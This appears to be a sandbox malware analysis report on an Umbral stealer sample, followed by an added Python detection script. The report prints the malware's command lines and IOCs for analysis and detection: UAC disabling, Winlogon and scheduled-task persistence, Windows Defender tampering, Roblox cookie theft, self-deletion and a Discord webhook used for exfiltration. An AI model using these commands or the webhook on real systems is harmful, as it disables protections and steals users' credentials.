Analysis
max time kernel: 149s
max time network: 150s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 05-06-2024 01:53
Static task
static1
Behavioral task
behavioral1
Sample
Client.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Client.exe
Resource
win10v2004-20240426-en
General
Target: Client.exe
Size: 380KB
MD5: 7091d715676e10c44205e6fa7f50b7bd
SHA1: a950398047b6b554181538d6e78ada18bfba510e
SHA256: 23f43cc11c07245b3c5c14333a53b97330ebd7afa4a893245834fbebfa967d88
SHA512: 2fd66a8fd5b4d0f1ef52f6cd89b8e14936b56fdb967a83382d8081e67fbbabdb609decef98d19c8caebcc1b5b9bcc3cbaa0209112c9c081556ff87bfcdf7308b
SSDEEP: 6144:MwZC8z6GIwaC9M1G4TIcgGz+rH4uCBbhZnKMgVia:RZC8OGgt1G4TGY+NCNn4Vi
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1247729405409759390/zWUzhv3beId_l06S4nnTrfCRsAkIoHRjlpnuQcnbUkUm0eJjGGkP-VfghAOgfXCbrdiS
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
  resource: behavioral1/memory/2848-10-0x0000000000870000-0x000000000087A000-memory.dmp | yara_rule: disable_win_def
-
Detect Umbral payload 2 IoCs
  resource: behavioral1/files/0x0004000000004ed7-49.dat | yara_rule: family_umbral
  resource: behavioral1/memory/2684-51-0x0000000000180000-0x00000000001C0000-memory.dmp | yara_rule: family_umbral
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Program Files\\$77fuh.exe" | Process: Client.exe
-
UAC bypass 3 IoCs
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" | Process: Client.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" | Process: Client.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" | Process: Client.exe
-
Command and Scripting Interpreter: PowerShell 2 IoCs
  pid 2444 powershell.exe
  pid 1736 powershell.exe
-
Drops file in Drivers directory 1 IoCs
  File opened for modification C:\Windows\System32\drivers\etc\hosts | Process: l1gdcwtr.ezy.exe
-
Executes dropped EXE 1 IoCs
  pid 2684 l1gdcwtr.ezy.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks whether UAC is enabled 2 IoCs
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua | Process: Client.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" | Process: Client.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  flow 16 discord.com
  flow 17 discord.com
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 14 ip-api.com
-
Drops file in Program Files directory 1 IoCs
  File created C:\Program Files\$77fuh.exe | Process: Client.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 46 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
  schtasks.exe pids: 2924, 2508, 1148, 2564, 768, 1996, 2804, 1476, 1796, 496, 968, 2588, 1924, 1580, 1224, 1236, 2956, 3008, 2476, 2728, 1924, 556, 356, 1448, 960, 2980, 2348, 2580, 2556, 1720, 1148, 900, 1952, 1640, 2688, 704, 652, 2044, 2776, 892, 2800, 944, 1284, 1416, 1728, 2604
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
  pid 1956 wmic.exe
-
Runs ping.exe 1 TTPs 1 IoCs
  pid 960 PING.EXE
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
  2848 Client.exe (10 events); 2444 powershell.exe (3 events); 1736, 2204, 1996, 792 and 2272 powershell.exe (1 event each)
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
  SeDebugPrivilege: 2848 Client.exe, 2444 powershell.exe, 2684 l1gdcwtr.ezy.exe, 1736 powershell.exe, 2204 powershell.exe, 1996 powershell.exe, 792 powershell.exe
  2080 wmic.exe (the full set, twice): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  1988 wmic.exe (once): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege
-
Suspicious use of WriteProcessMemory 64 IoCs
  Each parent -> child write is recorded three times; listed as "source PID image -> target PID (procid_target)":
  2848 Client.exe -> 2568 (29); 2568 CMD.exe -> 2556 (31); 2848 Client.exe -> 2504 (32); 2504 CMD.exe -> 2564 (34); 2848 Client.exe -> 1576 (37); 1576 CMD.exe -> 2688 (39); 2848 Client.exe -> 1548 (40); 1548 CMD.exe -> 1720 (42); 2848 Client.exe -> 820 (43); 820 CMD.exe -> 1924 (45); 2848 Client.exe -> 2300 (46); 2300 CMD.exe -> 768 (48); 2848 Client.exe -> 2280 (49); 2280 CMD.exe -> 1580 (51); 2848 Client.exe -> 1368 (52); 1368 CMD.exe -> 1148 (54); 2848 Client.exe -> 1532 (55); 1532 CMD.exe -> 1284 (57); 2848 Client.exe -> 2104 (58); 2104 CMD.exe -> 1224 (60); 2848 Client.exe -> 2072 (61); 2072 CMD.exe -> 1996 (63, recorded once as entry 64 of 64)
-
System policy modification 1 TTPs 3 IoCs
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" | Process: Client.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" | Process: Client.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" | Process: Client.exe
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
  pid 2352 attrib.exe
Processes
-
[1] C:\Users\Admin\AppData\Local\Temp\Client.exe (PID 2848)
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    - Modifies WinLogon for persistence
    - UAC bypass
    - Checks whether UAC is enabled
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - System policy modification

  [2] C:\Windows\system32\CMD.exe (PID 2568)
      "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Visio" /tr "C:\Program Files\$77fuh.exe" & exit
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\schtasks.exe (PID 2556)
        SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Visio" /tr "C:\Program Files\$77fuh.exe"
        - Creates scheduled task(s)

  [2] C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
    [3] C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        - Creates scheduled task(s)
      Client.exe spawns this CMD -> schtasks pair 33 times in a row with the identical command line (CMD PID -> schtasks PID): 2504 -> 2564, 1576 -> 2688, 1548 -> 1720, 820 -> 1924, 2300 -> 768, 2280 -> 1580, 1368 -> 1148, 1532 -> 1284, 2104 -> 1224, 2072 -> 1996, 324 -> 556, 924 -> 1416, 1584 -> 1796, 1800 -> 1728, 2116 -> 2044, 1124 -> 2924, 2888 -> 496, 1004 -> 1236, 1608 -> 1448, 1312 -> 356, 404 -> 960, 1012 -> 2956, 888 -> 704, 1708 -> 2776, 1552 -> 3008, 2220 -> 2980, 1676 -> 892, 2844 -> 2728, 1516 -> 2800, 2964 -> 2588, 2908 -> 2348, 2304 -> 2508, 2768 -> 2580. The first ten CMD instances (2504 through 2072) additionally carry "Suspicious use of WriteProcessMemory".

  [2] C:\Windows\System32\cmd.exe (PID 2556)
      "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe"' & exit
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2444)
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe"'
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      [4] C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe (PID 2684)
          "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe"
          - Drops file in Drivers directory
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\system32\attrib.exe (PID 2352)
            "attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe"
            - Views/modifies file attributes
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1736)
            "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2204)
            "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1996)
            "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 792)
            "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\System32\Wbem\wmic.exe (PID 2080)
            "wmic.exe" os get Caption
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\System32\Wbem\wmic.exe (PID 1988)
            "wmic.exe" computersystem get totalphysicalmemory
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\System32\Wbem\wmic.exe (PID 2932)
            "wmic.exe" csproduct get uuid
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2272)
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            - Suspicious behavior: EnumeratesProcesses
        [5] C:\Windows\System32\Wbem\wmic.exe (PID 1956)
            "wmic" path win32_VideoController get name
            - Detects videocard installed
        [5] C:\Windows\system32\cmd.exe (PID 1556)
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe" && pause
          [6] C:\Windows\system32\PING.EXE (PID 960)
              ping localhost
              - Runs ping.exe

  [2] C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
    [3] C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
        - Creates scheduled task(s)
      After the stealer subtree, Client.exe spawns the same pair a further 12 times (CMD PID -> schtasks PID): 548 -> 1924, 1568 -> 1148, 964 -> 944, 2008 -> 968, 1680 -> 2804, 2720 -> 1476, 1452 -> 652, 2232 -> 900, 1444 -> 1952, 2796 -> 2476, 1536 -> 1640, 2608 -> 2604.

[1] C:\Windows\system32\wbem\WmiApSrv.exe (PID 2860)
    C:\Windows\system32\wbem\WmiApSrv.exe
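The signatures and process tree above reduce to a handful of host and network rules a responder would want to run over their own telemetry. The Python below is an added example, not sandbox output and not code from the Umbral sample: it evaluates those rules over events constructed from the report's own command lines, registry writes and flows. The event tuples, the rule names and the `check_*` helpers are this example's own conventions. One caveat it encodes: schtasks accepts /MO values from 1 to 1439 with /SC MINUTE, so the `/mo -1` command line that Client.exe issues 45 times is rejected by schtasks, and the OnLogon "Microsoft Visio" task plus the Winlogon Userinit entry are the persistence to look for on a host.

```python
"""Triage rules for the behaviours in this report, run over constructed events.
Added example: not sandbox output and not code from the Umbral sample."""
import re
import shlex
from dataclasses import dataclass

UAC_POLICY_KEY = r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
WINLOGON_KEY = r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
UAC_VALUES = {"enablelua", "consentpromptbehavioradmin", "promptonsecuredesktop"}
PAYLOAD = r"C:\Program Files\$77fuh.exe"  # paths taken from the report above
DROPPED = r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe"

@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str

def _argv(cmdline):
    """Split a Windows command line; posix=False keeps backslashes and $ literal."""
    try:
        toks = shlex.split(cmdline, posix=False)
    except ValueError:
        toks = cmdline.split()
    return [t.strip("'\"") for t in toks]

def _exe(argv):
    """Image name without directory or .exe, lower-cased ("SchTaSKs" -> "schtasks")."""
    name = argv[0].rsplit("\\", 1)[-1].lower() if argv else ""
    return name[:-4] if name.endswith(".exe") else name

def _opt(argv, switch):
    """Argument following a case-insensitive /switch, or None if absent."""
    low = [a.lower() for a in argv]
    i = low.index(switch) if switch in low else -1
    return argv[i + 1] if 0 <= i < len(argv) - 1 else None

def check_process(cmdline):
    """Rules for the process-creation command lines seen in the tree above."""
    argv, low, out = _argv(cmdline), cmdline.lower(), []
    exe = _exe(argv)
    if exe == "schtasks" and "/create" in [a.lower() for a in argv]:
        tn, tr, sc, mo = (_opt(argv, s) for s in ("/tn", "/tr", "/sc", "/mo"))
        detail = f"task {tn!r} runs {tr!r} sc={sc} mo={mo}"
        if (_opt(argv, "/rl") or "").lower() == "highest":
            out.append(Finding("schtasks_highest_runlevel", detail))
        # schtasks only accepts /MO 1-1439 with /SC MINUTE; "-1" is rejected and no task is created
        if (sc or "").lower() == "minute" and not (mo and mo.isdigit() and 1 <= int(mo) <= 1439):
            out.append(Finding("schtasks_invalid_mo", detail))
    if exe == "powershell" and "set-mppreference" in low:
        flags = re.findall(r"-(disable\w+)\s+\$true", low)
        if flags or "-mapsreporting disabled" in low or "-submitsamplesconsent" in low:
            out.append(Finding("defender_tamper", ",".join(flags) or "reporting/consent changed"))
    if exe == "powershell" and "add-mppreference" in low and "-exclusionpath" in low:
        m = re.search(r"-exclusionpath\s+['\"]?([^'\"]+)", low)
        out.append(Finding("defender_exclusion", m.group(1).strip() if m else "?"))
    if exe == "cmd" and re.search(r"\bping\b.*&&\s*del\b", low):  # ping as a sleep, then delete self
        out.append(Finding("self_delete_via_ping", low.split("&&")[1].strip()))
    if exe == "attrib" and "+h" in argv and "+s" in argv:
        out.append(Finding("hidden_system_attrib", argv[-1]))
    return out

def check_registry(path, value):
    """Winlogon\\Userinit gains an extra executable; UAC policy values are zeroed."""
    key, _, name = path.rpartition("\\")
    name = name.lower()
    if key.lower() == WINLOGON_KEY.lower() and name == "userinit":
        entries = [e.strip() for e in str(value).split(",") if e.strip()]
        extra = [e for e in entries if not e.lower().endswith("\\userinit.exe")]
        return [Finding("winlogon_userinit_append", e) for e in extra]
    if key.lower() == UAC_POLICY_KEY.lower() and name in UAC_VALUES and str(value) == "0":
        return [Finding("uac_policy_disabled", name)]
    return []

def check_flow(host, url=""):
    """External-IP lookup and Discord webhook used for exfiltration/C2."""
    if host.lower() == "ip-api.com":
        return [Finding("external_ip_lookup", host)]
    m = re.match(r"https://discord\.com/api/webhooks/(\d+)/", url)
    if host.lower() == "discord.com" and m:
        return [Finding("discord_webhook_c2", f"webhook id {m.group(1)}")]
    return []

def triage(events):
    """events: (kind, payload) tuples; returns findings in event order."""
    checks = {"process": check_process, "registry": lambda p: check_registry(*p), "flow": lambda p: check_flow(*p)}
    return [f for kind, payload in events for f in checks[kind](payload)]

SAMPLE_EVENTS = [  # constructed from the report's command lines, registry writes and flows
    ("process", f'"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Visio" /tr "{PAYLOAD}" & exit'),
    ("process", f'SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Visio" /tr "{PAYLOAD}"'),
    ("process", f'SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "{PAYLOAD}" /RL HIGHEST'),
    ("process", f'"powershell.exe" Add-MpPreference -ExclusionPath \'{DROPPED}\''),
    ("process", '"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true '
                '-DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled '
                '-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend '
                '&& powershell Set-MpPreference -SubmitSamplesConsent 2'),
    ("process", f'"attrib.exe" +h +s "{DROPPED}"'),
    ("process", f'"cmd.exe" /c ping localhost && del /F /A h "{DROPPED}" && pause'),
    ("registry", (WINLOGON_KEY + r"\Userinit", r"C:\Windows\System32\userinit.exe," + PAYLOAD)),
    ("registry", (UAC_POLICY_KEY + r"\EnableLUA", "0")),
    ("registry", (UAC_POLICY_KEY + r"\ConsentPromptBehaviorAdmin", "0")),
    ("flow", ("ip-api.com", "")),
    ("flow", ("discord.com", "https://discord.com/api/webhooks/1247729405409759390/zWUzhv3beId_l06S4nnTrfCRsAkIoHRjlpnuQcnbUkUm0eJjGGkP-VfghAOgfXCbrdiS")),
]

if __name__ == "__main__":
    print(*triage(SAMPLE_EVENTS), sep="\n")
```

Running the block prints twelve findings for the constructed events: both schtasks invocations for their HIGHEST run level, the minute-interval one additionally for its out-of-range /MO, the Defender exclusion and the tamper flags, the attrib and ping-then-del lines, the Userinit append, the two zeroed UAC values, and the two flows. The wmic and Get-ItemPropertyValue recon lines from the tree trigger nothing on their own, which is the right default for a rule set that is meant to be run against a fleet.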
Network
MITRE ATT&CK Enterprise v15
Persistence
  Boot or Logon Autostart Execution (1): Winlogon Helper DLL (1)
  Scheduled Task/Job (1)
Privilege Escalation
  Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
  Boot or Logon Autostart Execution (1): Winlogon Helper DLL (1)
  Scheduled Task/Job (1)
Downloads
-
Filesize: 380KB
MD5: 7091d715676e10c44205e6fa7f50b7bd
SHA1: a950398047b6b554181538d6e78ada18bfba510e
SHA256: 23f43cc11c07245b3c5c14333a53b97330ebd7afa4a893245834fbebfa967d88
SHA512: 2fd66a8fd5b4d0f1ef52f6cd89b8e14936b56fdb967a83382d8081e67fbbabdb609decef98d19c8caebcc1b5b9bcc3cbaa0209112c9c081556ff87bfcdf7308b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB
MD5: 32c10adfa070cac5233ba09dfd7d6568
SHA1: 549315ddea6a09bbdf25c552d4a20183483564a1
SHA256: cb59c3b2085b9e3950cb64e35a1d8defd4bcc3ec5bfce3c216f7cc80f87d62bf
SHA512: 61623834c50f3ce0daa1d9a9db15930ddb473a09ac69f5ab9f5a0a17dac4b2f45d727c7be5a9dadd6af7b66489f9c3f57b070fd8f35aa11dddc256c4290ebf20
-
Filesize: 227KB
MD5: 53681862212e052e3c6b3e9ca9594428
SHA1: f89c700368b19d182062f673f9b51199e08c47cc
SHA256: 2576a8b91992cead33bc30b306852a6fbaa559fff89a534537495abe76aca3a2
SHA512: 2f9649751aeeabd4e59b7e172937518bb6867ce99eee00687243d6218edbdbc5d573a5cea36416131a3787360d215d557f91c75f480d30ce3d6bbd1152e81fa8